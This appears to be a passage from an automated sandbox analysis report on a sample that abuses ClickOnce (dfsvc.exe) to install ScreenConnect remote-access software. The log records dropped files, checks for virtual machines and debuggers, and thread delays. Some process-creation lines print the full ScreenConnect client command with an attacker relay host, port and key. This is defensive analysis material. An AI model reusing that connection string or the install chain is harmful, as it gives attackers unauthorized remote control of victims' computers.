                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 272FD4C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 272FEED0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeMemory allocated: B20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeMemory allocated: 1A700000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeMemory allocated: 720000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeMemory allocated: 2650000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeMemory allocated: E30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 526Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 1569Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 2573Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..vice_4b14c015c87c1ad8_0018.0004_none_04f4a774935ed06c\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..dows_4b14c015c87c1ad8_0018.0004_none_5818e70d39ed8031\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..core_4b14c015c87c1ad8_0018.0004_none_53a10f2bfd9f6d01\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9b66cfe0ceec305\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe TID: 6844Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6160Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6192Thread sleep time: -128650s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6160Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe TID: 6232Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe TID: 7044Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe TID: 4960Thread sleep count: 200 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_00764B9B FindFirstFileExA,0_2_00764B9B
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\Jump to behavior
                  Source: Amcache.hve.8.drBinary or memory string: VMware
                  Source: ScreenConnect.WindowsClient.exe, 00000004.00000002.1499314976.000000001AFD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE|+9Y
                  Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.8.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                  Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.8.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.8.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.8.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.8.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: dfsvc.exe, 00000001.00000002.2720941226.000002729B6B7000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2724880661.00000272FF5C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.8.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.8.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.8.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.8.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.8.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: dfsvc.exe, 00000001.00000002.2720941226.000002729B6B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW"e
                  Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_00761920 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00761920
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_00761000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00761000
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_007637C7 mov eax, dword ptr fs:[00000030h]0_2_007637C7
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_007669E3 GetProcessHeap,0_2_007669E3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_00761493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00761493
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_00761920 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00761920
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_007646C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007646C3
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_00761AAD SetUnhandledExceptionFilter,0_2_00761AAD
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=variols.ephelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQBN%2fsDy6XX2LDmcpyEoKK55JwThlRr7YHNGe39snOuHFtnjCyK72cZJH78V0V1YAf3iHC4VrBqpgJlkVuiU31AA%2fvSAfza7nhZjCa5ykV2NAakmwwsZZcF4P1vkpVkI7ANPAC%2bVyPuI2q4BXqVaSlq5q6E2QfxXeftcqNGKOU7f6LwNITHSyFLXqkb6omGbacpFoHOXIhxtO51vc7VoYDnePo%2bPLojTyIgk0TnsKSl3v5MmaDGdZnaRO%2fgpfn0w%2fd8d4r7vK%2b35r8AOTYEvrTtJo%2bk50eZpwyQ3Wb4JzVjk4643SyQu2kEB3raxmEp6Lu%2bCnvj%2fq6inamW4uCChS0u0&r=&i=" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\v0dmj93t.z9b\4kqq0db9.hm7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\screenconnect.clientservice.exe" "?e=support&y=guest&h=variols.ephelp.site&p=8880&k=bgiaaackaabsu0exaagaaaeaaqbn%2fsdy6xx2ldmcpyeokk55jwthlrr7yhnge39snouhftnjcyk72czjh78v0v1yaf3ihc4vrbqpgjlkvuiu31aa%2fvsafza7nhzjca5ykv2naakmwwszzcf4p1vkpvki7anpac%2bvypui2q4bxqvaslq5q6e2qfxxeftcqngkou7f6lwnithsyflxqkb6omgbacpfohoxihxto51vc7voydnepo%2bplojtyigk0tnsksl3v5mmadgdznaro%2fgpfn0w%2fd8d4r7vk%2b35r8aotyevrttjo%2bk50ezpwyq3wb4jzvjk4643syqu2keb3raxmep6lu%2bcnvj%2fq6inamw4ucchs0u0&r=&i=" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\v0dmj93t.z9b\4kqq0db9.hm7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\screenconnect.clientservice.exe" "?e=support&y=guest&h=variols.ephelp.site&p=8880&k=bgiaaackaabsu0exaagaaaeaaqbn%2fsdy6xx2ldmcpyeokk55jwthlrr7yhnge39snouhftnjcyk72czjh78v0v1yaf3ihc4vrbqpgjlkvuiu31aa%2fvsafza7nhzjca5ykv2naakmwwszzcf4p1vkpvki7anpac%2bvypui2q4bxqvaslq5q6e2qfxxeftcqngkou7f6lwnithsyflxqkb6omgbacpfohoxihxto51vc7voydnepo%2bplojtyigk0tnsksl3v5mmadgdznaro%2fgpfn0w%2fd8d4r7vk%2b35r8aotyevrttjo%2bk50ezpwyq3wb4jzvjk4643syqu2keb3raxmep6lu%2bcnvj%2fq6inamw4ucchs0u0&r=&i=" "1"Jump to behavior
                  Source: ScreenConnect.WindowsClient.exe, 00000004.00000000.1097848481.0000000000352000.00000002.00000001.01000000.00000009.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 00000004.00000000.1097848481.0000000000352000.00000002.00000001.01000000.00000009.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.WindowsFileManager.exe.config VolumeInformationJump to behavior
